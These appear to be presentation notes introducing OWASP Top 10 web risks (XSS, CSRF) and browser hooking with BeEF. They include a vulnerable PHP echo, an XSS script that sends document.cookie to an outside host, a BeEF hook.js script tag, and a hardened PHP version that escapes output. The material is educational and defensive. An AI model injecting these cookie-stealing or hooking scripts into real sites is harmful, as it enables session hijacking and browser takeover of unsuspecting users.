So just how bad is the bad stuff the bad people do?
OWASP, the Open Web Application Security Project, try to categorise the top 10 riskiest web security weaknesses. Known as the OWASP Top 10, it’s a great resource. www.owasp.org
Cross Site Scripting (XSS)
In the OWASP Top 10 this comes in at number 2, and they describe it as so: “XSS flaws occur when an application includes user supplied data in a page sent to the browser without properly validating or escaping that content”
Server code:
1. Take ‘greeting’ parameter: page.php?greeting=<input>
2. Dynamically print that out in the response: <p><?php echo $_GET['greeting'] ?></p>
What if greeting was:
<script>img=new Image();img.src='http://frichot.com/nom.php?cookie='+document.cookie;</script>
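For comparison, a hardened version of the page.php handler above, as an added example that is not from the original slides. The function names html_escape and render_greeting, the CSP policy and the cookie settings are assumptions chosen for illustration, and the array form of session_set_cookie_params needs PHP 7.3 or later.

```php
<?php
// Added example: hardened counterpart of the vulnerable page.php echo.
declare(strict_types=1);

// Escape untrusted text for an HTML element body or a quoted attribute value.
// (hypothetical helper name)
function html_escape(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Build the response fragment from the query parameters.
// (hypothetical helper name)
function render_greeting(array $query): string
{
    $greeting = $query['greeting'] ?? '';
    // page.php?greeting[]=x arrives as an array, not a string: reject it.
    if (!is_string($greeting)) {
        $greeting = '';
    }
    // Output encoding at the point of use: markup in the parameter is
    // rendered as inert text instead of being parsed by the browser.
    return '<p>' . html_escape($greeting) . '</p>';
}

if (PHP_SAPI !== 'cli') {
    // Defence in depth, in case an unescaped sink is missed elsewhere.
    header('Content-Type: text/html; charset=UTF-8');
    header('X-Content-Type-Options: nosniff');
    // Illustrative policy: no inline scripts, no images from other origins.
    header("Content-Security-Policy: default-src 'self'; script-src 'self'; img-src 'self'");
    // HttpOnly keeps the session cookie out of document.cookie.
    session_set_cookie_params([
        'httponly' => true,
        'secure'   => true,
        'samesite' => 'Lax',
    ]);
    session_start();
    echo render_greeting($_GET);
} else {
    // Constructed sample input for running the file from the command line.
    $sample = ['greeting' => '<script>alert(1)</script>'];
    echo render_greeting($sample), PHP_EOL;
}
```

Escaping is the primary fix; the CSP header and the HttpOnly flag only limit the damage if some other page still echoes input unescaped.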
Cross Site Request Forgery (CSRF)
CSRF comes in at number 5 in the OWASP Top 10, described as: “Since browsers send credentials like session cookies automatically, attackers can create malicious web pages which generate forged requests that are indistinguishable from legitimate ones.”
Hooking Browsers
• XSS
• Social Engineering (i.e. tiny URL, or phishing via email)
• Embedding the payload (think drive-by download)
• Maintaining persistence after already being hooked (think Tab BeEF Injection)
<script src="http://beefserver.com/hook.js"></script>
This is pretty much all you need.